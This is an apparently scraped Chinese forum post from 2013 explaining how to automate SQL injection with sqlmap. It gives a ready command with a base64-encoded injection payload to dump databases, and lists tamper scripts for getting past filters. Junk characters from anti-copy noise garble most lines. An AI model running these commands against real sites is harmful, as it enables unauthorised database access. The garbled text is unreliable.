WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
8 R8 Z9 {. e1 {! e1 V
0 e- G, K8 F) B3 w1 Asqlmap的tamper里有个base64encode.py( Q6 R: c3 S- R
% Q% }0 C, l: H5 R. K7 f, ~# K使用如下
$ x/ T& l0 h" y( n6 t: U7 {
' K, j# c9 K1 o6 jsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
+ d+ ^8 S6 N% ~' V3 U6 `4 P1 J- c' z0 x- x# }; J
4 R' _3 t9 O( O, Jsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
4 Y/ b+ C; @* y8 N3 b }3 G
& J5 W# T6 Q8 s$ U# ]6 O其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
) x+ y* E8 X, n- h$ {6 r! C4 ?$ A) g; T% T& N1 e7 b" H4 D3 y
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入: m+ I' \! y) V% o5 m
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
. G' W0 C$ Z$ B# e首先确定目标数据库版本,然后选择相应的脚本。
7 E( ^4 y2 ]" a/ ~-v 3 --batch --tamper "space2hash.py"
; B) f5 b' N: _3 K/ d2 V* r% N' D- v- r0 v5 B
还有其他一些插件:
$ O, \% v4 ]) F! S" q3 N r: {encodes编码 ——charencode.py
- `3 I1 d. b7 _( q3 }base64编码 —— base64encode.py
- U M' n1 m; n) \替换空格和关键字 —— halfversionedmorekeywords.py
# z2 Z1 E$ j; o6 N+ B; y+ y- ]- ? |
8 D- Y7 Y) A0 O7 Y9 j$ m7 S! a
1 Y' \5 o7 ?$ K" G2 M( Z7 [# M5 E/ X! `) g% [4 n9 P
# E3 o% t$ k8 F! D% g, r# ?0 [
|
发表于 2013-11-23 15:50:45
收藏
支持
反对